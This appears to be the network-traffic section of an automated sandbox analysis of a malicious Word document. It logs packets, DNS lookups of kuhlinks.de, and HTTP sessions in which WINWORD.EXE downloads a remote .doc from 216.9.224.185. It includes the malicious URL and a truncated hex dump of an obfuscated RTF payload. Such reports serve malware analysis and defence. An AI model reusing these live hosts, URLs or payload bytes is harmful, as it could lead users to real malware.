Apr 2, 2025 12:00:43.665982962 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.665988922 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666012049 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666017056 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666044950 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666050911 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666085005 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666100979 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666115046 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666125059 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666141033 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666151047 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666158915 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666182995 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666182995 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666202068 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666208029 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666218042 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666243076 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666255951 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666260004 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666273117 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.666296959 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.666313887 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.904383898 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.904405117 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.904510021 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.908724070 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908740997 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908757925 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908766985 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908835888 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.908881903 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908896923 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908910990 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908922911 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908934116 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.908940077 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908946991 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.908955097 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908967972 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908974886 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.908982038 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.908997059 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909003019 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909013033 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909020901 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909043074 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909046888 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909061909 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909075975 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909080029 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909091949 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909105062 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909107924 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909118891 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909132957 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909132957 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909149885 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909152031 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909176111 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909199953 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909214020 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909245014 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909293890 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909306049 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909318924 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909322977 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909332991 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909348965 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909363985 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909389973 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.909905910 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909985065 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.909998894 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.910012007 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.910021067 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.910037041 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.910121918 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.910135031 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.910154104 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.910176992 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:43.910192966 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.910206079 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.910213947 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:43.910249949 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.154470921 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.154526949 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.154527903 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.154542923 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.154562950 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.154597998 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.179574013 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179590940 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179604053 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179619074 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179629087 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.179666042 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.179743052 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179755926 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179769993 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179779053 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.179811001 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.179925919 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179943085 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179958105 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.179960966 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.179975986 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.179996014 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.410861015 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:44.410932064 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:44.505847931 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:44.505896091 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:44.506872892 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:44.508217096 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:44.508246899 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:44.712158918 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:44.712248087 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:44.778906107 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:44.778927088 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:44.779588938 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:44.779673100 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:44.785413980 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:44.785413980 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:44.785531044 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:44.785634995 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:45.303451061 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:45.303525925 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:45.303694963 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:45.303694963 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:45.303694963 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:45.305079937 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:45.576210976 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:45.576308012 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:45.605353117 CEST	60843	443	192.168.2.24	172.67.144.140
Apr 2, 2025 12:00:45.605386972 CEST	443	60843	172.67.144.140	192.168.2.24
Apr 2, 2025 12:00:47.109486103 CEST	80	60836	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:47.109601021 CEST	60836	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:47.111859083 CEST	60836	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:00:47.377196074 CEST	80	60836	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:50.606215954 CEST	80	60840	216.9.224.185	192.168.2.24
Apr 2, 2025 12:00:50.606306076 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:02:26.088608027 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:02:26.708411932 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:02:27.817789078 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:02:30.036571980 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:02:34.458452940 CEST	60840	80	192.168.2.24	216.9.224.185
Apr 2, 2025 12:02:43.286643028 CEST	60840	80	192.168.2.24	216.9.224.185

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 2, 2025 12:00:38.312674999 CEST	52688	53	192.168.2.24	1.1.1.1
Apr 2, 2025 12:00:38.558067083 CEST	53	52688	1.1.1.1	192.168.2.24
Apr 2, 2025 12:00:44.617645979 CEST	52688	53	192.168.2.24	1.1.1.1
Apr 2, 2025 12:00:45.011636972 CEST	53	52688	1.1.1.1	192.168.2.24

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 2, 2025 12:00:38.312674999 CEST	192.168.2.24	1.1.1.1	0x9350	Standard query (0)	kuhlinks.de	A (IP address)	IN (0x0001)	false
Apr 2, 2025 12:00:44.617645979 CEST	192.168.2.24	1.1.1.1	0x86fb	Standard query (0)	185.224.9.216.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 2, 2025 12:00:37.672543049 CEST	1.1.1.1	192.168.2.24	0xc9f9	No error (0)	ecs-office.s-0005.dual-s-msedge.net	s-0005.dual-s-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 2, 2025 12:00:37.672543049 CEST	1.1.1.1	192.168.2.24	0xc9f9	No error (0)	s-0005.dual-s-msedge.net		52.123.129.14	A (IP address)	IN (0x0001)	false
Apr 2, 2025 12:00:37.672543049 CEST	1.1.1.1	192.168.2.24	0xc9f9	No error (0)	s-0005.dual-s-msedge.net		52.123.128.14	A (IP address)	IN (0x0001)	false
Apr 2, 2025 12:00:38.558067083 CEST	1.1.1.1	192.168.2.24	0x9350	No error (0)	kuhlinks.de		172.67.144.140	A (IP address)	IN (0x0001)	false
Apr 2, 2025 12:00:38.558067083 CEST	1.1.1.1	192.168.2.24	0x9350	No error (0)	kuhlinks.de		104.21.47.51	A (IP address)	IN (0x0001)	false
Apr 2, 2025 12:00:45.011636972 CEST	1.1.1.1	192.168.2.24	0x86fb	No error (0)	185.224.9.216.in-addr.arpa			PTR (Pointer record)	IN (0x0001)	false
Apr 2, 2025 12:00:47.287020922 CEST	1.1.1.1	192.168.2.24	0x6a7b	No error (0)	res-stls-prod.edgesuite.net.globalredir.akadns88.net	a726.dscd.akamai.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 2, 2025 12:00:47.287020922 CEST	1.1.1.1	192.168.2.24	0x6a7b	No error (0)	a726.dscd.akamai.net		23.219.161.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

kuhlinks.de

216.9.224.185

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.24	60836	216.9.224.185	80	7312	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Apr 2, 2025 12:00:41.830538034 CEST	454	OUT	HEAD /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1 Connection: Keep-Alive Authorization: Bearer User-Agent: Microsoft Office Word 2014 X-Office-Major-Version: 16 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2 X-IDCRL_ACCEPTED: t Host: 216.9.224.185
Apr 2, 2025 12:00:42.086951971 CEST	323	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 10:00:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT ETag: "198aa-631c505d8feaa" Accept-Ranges: bytes Content-Length: 104618 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.24	60840	216.9.224.185	80	7312	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Apr 2, 2025 12:00:43.166783094 CEST	334	OUT	GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: 216.9.224.185
Apr 2, 2025 12:00:43.414607048 CEST	1254	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 10:00:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT ETag: "198aa-631c505d8feaa" Accept-Ranges: bytes Content-Length: 104618 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 09 09 7b 5c 2a 5c 64 67 6d 4e 6f 64 65 4b 69 6e 64 38 34 34 31 33 39 33 39 32 20 5c 2d 7d 0d 7b 5c 32 39 37 36 35 30 35 31 31 2f 25 2c 3c 36 3e 32 a7 3a 2f 7e 3f 39 b0 7e 39 5f 40 25 2a 39 3d b5 40 24 7c 34 5d 28 31 3c 3a 35 31 28 39 3f 26 27 3f 2e 5b 23 2c 35 34 32 2e 2a 5f 25 25 39 37 7e 3f 3d 2d 2f 35 30 27 35 3f 2c 27 40 2f 24 3c 37 3b 31 30 2f 25 35 40 21 27 3f 40 2f 60 40 3f a7 3d 3f 5e 2b 3d 35 30 7e 3f 5e 3e 2a 23 30 2a 3f 5d 2d 3b 25 3f 5b 27 2f b0 2a 39 38 32 39 5e 25 b0 2f 33 2d b5 33 b0 3f 31 29 26 31 5e 30 28 5e 7c 2f 35 b0 28 b0 3e 5f 28 5d 28 5e 29 3b 40 3c 3f 25 7e 25 26 28 2f 3f 31 b0 2e 3c 37 2c 3f 3e 39 39 3d 3f 21 32 3a 36 25 34 2e 2d 23 5d 3d 7e a7 b0 40 b5 5d 2f 2f 3a b0 2f 3f 5d 24 2a 3b 3d 28 b0 3d 35 2a a7 39 3a 24 5f 5d 32 3c 3c 35 24 38 3c 3b 5e 2b 25 b0 34 3c 3f 3f 33 29 3f 39 21 5d 32 60 3e 2a 33 35 3a 60 40 3a 39 36 2c 3f b5 29 3b 23 3f 33 5f b5 3f 2e 5b 25 31 27 3f 5f 27 a7 25 36 3f 29 25 25 33 34 3f b0 3f 29 3e 3f 60 25 3d 27 28 2f 3f b0 5e [TRUNCATED] Data Ascii: {\rtf1{\\dgmNodeKind844139392 \-}{\297650511/%,<6>2:/~?9~9_@%9=@$\|4](1<:51(9?&'?.[#,542._%%97~?=-/50'5?,'@/$<7;10/%5@!'?@/`@?=?^+=50~?^>#0?]-;%?['/9829^%/3-3?1)&1^0(^\|/5(>_(](^);@<?%~%&(/?1.<7,?>99=?!2:6%4.-#]=~@]//:/?]$;=(=59:$_]2<<5$8<;^+%4<??3)?9!]2`>35:`@:96,?);#?3_?.[%1'?_'%6?)%%34??)>?`%='(/?^`#]63;?3%``4?4-;?%,02]`)?`7?[1!92$?-4^('&?%?@;9818[\|/?=[5@3.##?,7^#-4></%#?7&!3-?.7>%5`+@4;5%,@->;'$;7)\|~)#(?~\|8(_/??-?@?'79_8?$?=0,^^%4~?0]^\|%]\|]!=;$2%<8&<.2:1`0?]$?)@9)4.%2)`.<51%$\|78?9-39[?=0#[?7:%&0:?,26?&~@#6[9522=+@,%'8;=829)/?[[?-??&?3(:=_83.1,>`[>[5$7%~)]@]#-,=''42_(!'!%7'%53+0/??0,?//3;/3??:0)1<.~!42$1.?)$\|>/8=<77+7%='?.1?2!.$%\|.94?%]6/#?`3^08%%%?//#343:]=%0%45$26=4+^%&=~?+:_?#$?+?5@!0<!(?)/5+&'>2'-`>?@#_;@??.:0;&->>%+06-0)((@&?``$~+?~,<0'=//`$:?3?~%<%-.?];[5,8.?/??%(%3]98()649!<%!=7?[$#*96?@@?25?&([%%17_[?#'?'!%9@0%,$2^1-?`.[)_&
Apr 2, 2025 12:00:43.414628983 CEST	1254	IN	Data Raw: 2b 33 30 b0 2a 3f 3f 3e 40 5e 5e 38 3e 3a 28 2f 5d 2e 3d 3e 36 24 34 b5 29 21 25 27 5b 2a 3a 3e 3f 23 3f 27 5d 32 37 2f 3b 39 a7 3f 3f 60 a7 3f 3d 3f 37 27 30 b0 3f 3e 29 25 23 5d 28 5b 33 3d 33 3f 5f 33 5e 40 b0 b0 2a a7 25 21 30 29 3f 3c a7 b5 Data Ascii: +30??>@^^8>:(/].=>6$4)!%'[:>?#?']27/;9??`?=?7'0?>)%#]([3=3?_3^@%!0)?<@+<??((=#4<57/@@6:~:$$:1'`=)@?1?7\|2$[)1>_2?):\|#?9%](?3%_9]^1?=15?'.&[+/5??:976)\|!7%?;?<]6$>&=?$?.?_-~9@1.2```.?':2;8_!^8'-+64[:[2?+-?.!)0;0/@[???].'[*
Apr 2, 2025 12:00:43.414644003 CEST	1254	IN	Data Raw: 40 3e 3b 5e 5f a7 3d 38 27 3b 3a 5e a7 39 5e 34 3f 23 5e 5f 24 24 3f 29 3a 3f 2f 2e 27 2e 35 5b 25 38 34 3f 5b 3d 7c 29 3f 3f b0 25 33 2e 5b 5f 60 3a 2d 2f 30 2c 24 b0 24 3a 2a 32 35 24 b5 5f 2e 26 28 3a b0 7e 33 2b b0 25 26 3f 26 7e 3c 2c 28 3f Data Ascii: @>;^_=8';:^9^4?#^_$$?):?/.'.5[%84?[=\|)??%3.[_`:-/0,$$:25$_.&(:~3+%&?&~<,(?\|5]?^;:[~0?0[2?1%`;8@60/-(\|^-5.^&?$$;'?/,?>@(%7+8#,#@\|`97\|3<6_?$>2=~^[$%-4?1#4?'?6.?~8\|3?):-)!??~%9$/2,6;]%$\|@6-?7#^(<,,?%3;!#?!=&'!%?,?+]/5
Apr 2, 2025 12:00:43.414659023 CEST	1254	IN	Data Raw: 5e 7e 39 40 36 60 3f 7c 30 35 5f 21 25 3f 2f 3f 3b 33 b0 3a 3a 28 32 31 2d 60 3b 2d 3f 28 35 39 30 24 21 3e 25 3f 2e 38 33 2d 31 39 5d 5b 5b a7 29 24 7e 33 37 2f 34 3f a7 40 5f 38 2b 25 3f b5 24 2a 24 25 3e 34 27 3b 26 2e 2a 5f 60 31 b5 23 3f 5e Data Ascii: ^~9@6`?\|05_!%?/?;3::(21-`;-?(590$!>%?.83-19][[)$~37/4?@_8+%?$$%>4';&._`1#?^>~`('>95;%,~%]+]&_(<086[#;(.=<\|?^.~6\|1`?::+^'6`??&??_,[9$~+7.@#][:'7:0^+>?~/+2;7!#!/&2;(>%:34)?6=2+%+*?33(5+]'5$`9.?+8@]4=%?]/@/%]:^:)8-;-96^;^:
Apr 2, 2025 12:00:43.414673090 CEST	1254	IN	Data Raw: 40 2b 34 60 3a 3f 37 3f 5e 24 23 2d 2a 38 38 3b 7e 40 b0 30 29 21 3a 3f 35 a7 25 60 2e 3e b0 5b 2a 2f 33 3f 27 3f 3f b5 2a 33 5f 25 27 5d 3f 5e 5d b5 26 2b 31 60 37 3c 7e 3f 5f 36 33 5b 34 37 36 2f 3b 3c 35 5b 3f 27 3a 31 5d 3f 35 39 3f 7c 2f 25 Data Ascii: @+4`:?7?^$#-88;~@0)!:?5%`.>[/3?'??3_%']?^]&+1`7<~?_63[476/;<5[?':1]?59?\|/%!>018+;<~09:3~?5>?<+-%>-4?2:00;<^38@/,?#=?><.`%71;8+;3]?3-5.??)]%\|(3.?;->:16!$%#(^+($']6@91!.4(5)?7(,%?_;~:_-8<49*_\|\|1`?8]#94??2?\|<_742@/[(\|10~%>(5&@,
Apr 2, 2025 12:00:43.414689064 CEST	1254	IN	Data Raw: 3f 3c 29 3a 37 3b 2d 25 23 5e a7 3f 60 25 25 36 3a 3f 38 3f 39 7c 24 26 b0 25 5e 35 21 3e 39 32 38 3f 21 31 3f 21 7e 3f 3f 5d 29 5e 34 2e 26 3f 3f 30 3f 2b 3f 29 3f 3e 28 5e 28 33 38 2f 33 32 2d 26 36 60 40 35 38 5f 32 35 25 34 23 b5 3c 28 3f 3f Data Ascii: ?<):7;-%#^?`%%6:?8?9\|$&%^5!>928?!1?!~??])^4.&??0?+?)?>(^(38/32-&6`@58_25%4#<(??%6'87\|-)<7)'@9$$%&7/=\|%?:9]):.(=_,37?3@,=3)>?_+21\|?/+87`[_6!!9/-:44;7%@??2$5/[]8=7>0^#:%..]]!?#$?0/1%?-]????0,83<?53=??+7?!$?8%(%13_?<*3-:9<5?^+7)$<<2
Apr 2, 2025 12:00:43.414704084 CEST	1254	IN	Data Raw: 38 2f 29 b5 b0 5b 2f 3b 3f 3f 37 b0 2a 3b 38 5f 5b 5b 7e 3d 2f 3f 60 34 29 35 3f 38 31 3d 30 5f 3b 3c 3f 29 7c 5f b0 30 27 27 2e 24 2a 2c 40 3c 36 39 2c 3d 29 2c 3e 3a 40 3f 29 26 5f 40 7c 34 7c 24 3c 38 38 37 3f 5d 39 38 40 25 38 5e 38 2d 27 3f Data Ascii: 8/)[/;??7;8_[[~=/?`4)5?81=0_;<?)\|_0''.$,@<69,=),>:@?)&_@\|4\|$<887?]98@%8^8-'??\|<<?~+&)?)??]%:?-?%&(.^5:&8^'4?,'`;&?,+,.-;?&^/9?^(?&??>(140#$';??)-8[0-.=.:8[%;0%?13%8`?'=-)#'-4<#93`<-[:0,_8791$30],`<?%+\|59,44!?+?.,?-2%'0386
Apr 2, 2025 12:00:43.414721012 CEST	1254	IN	Data Raw: 20 32 09 20 09 20 20 09 09 09 09 20 20 20 20 20 09 20 30 0d 0d 0a 0d 0a 0d 0d 0d 0a 0d 0a 0d 0d 0a 0d 0d 0d 0a 0a 0d 0a 0d 30 30 30 09 09 09 09 09 20 20 09 20 20 09 09 20 09 09 20 30 30 20 09 20 20 09 09 20 09 20 20 20 09 09 09 09 20 30 09 09 09 Data Ascii: 2 0000 00 0 c0000 004b4f635 5
Apr 2, 2025 12:00:43.414736986 CEST	1254	IN	Data Raw: 09 20 09 20 20 20 09 09 09 09 20 09 20 09 30 0a 0d 0a 0d 0d 0d 0a 0d 0a 0d 0d 0a 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 30 0d 0a 0a 0d 0a 0a 0d 0a 0d 0a 0a 0a 0d 0d 0d 0d 0d 0d 0a 0d 0a 0d 33 09 20 09 09 20 20 20 20 09 20 20 09 20 09 20 09 65 09 09 09 09 Data Ascii: 003 e 000 300fef f090 0 06
Apr 2, 2025 12:00:43.414753914 CEST	1254	IN	Data Raw: 0d 66 0a 0d 0d 0d 0a 0a 0d 0d 0d 0d 0d 0a 0d 0d 0a 0d 0d 0a 0a 0d 0a 0d 66 66 66 66 66 66 66 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0d 0d 0d 0d 0a 0d 0d 0a 0a 0d 0a 0d 66 09 20 20 09 09 09 20 09 09 09 20 09 09 20 20 20 66 66 09 20 20 09 09 09 20 09 09 09 Data Ascii: fffffffff ff ff fffff ff ff ff
Apr 2, 2025 12:00:43.664691925 CEST	1254	IN	Data Raw: 20 09 20 20 09 09 09 20 20 20 09 09 09 66 09 09 09 20 20 09 20 09 09 09 20 20 20 09 09 09 66 66 0d 0a 0a 0a 0d 0a 0d 0d 0d 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 0a 66 09 09 09 20 20 09 20 09 09 09 20 20 20 09 09 09 66 66 66 66 0a 0d 0a 0d 0d 0d 0a Data Ascii: f fff fffffffff ff f ffffffff
Apr 2, 2025 12:00:45.305079937 CEST	334	OUT	HEAD /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1 X-MS-CookieUri-Requested: t X-FeatureVersion: 1 X-IDCRL_ACCEPTED: t User-Agent: Microsoft Office Existence Discovery Connection: Keep-Alive Host: 216.9.224.185
Apr 2, 2025 12:00:45.576210976 CEST	322	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 10:00:45 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT ETag: "198aa-631c505d8feaa" Accept-Ranges: bytes Content-Length: 104618 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/msword

HTTPS Proxied Packets

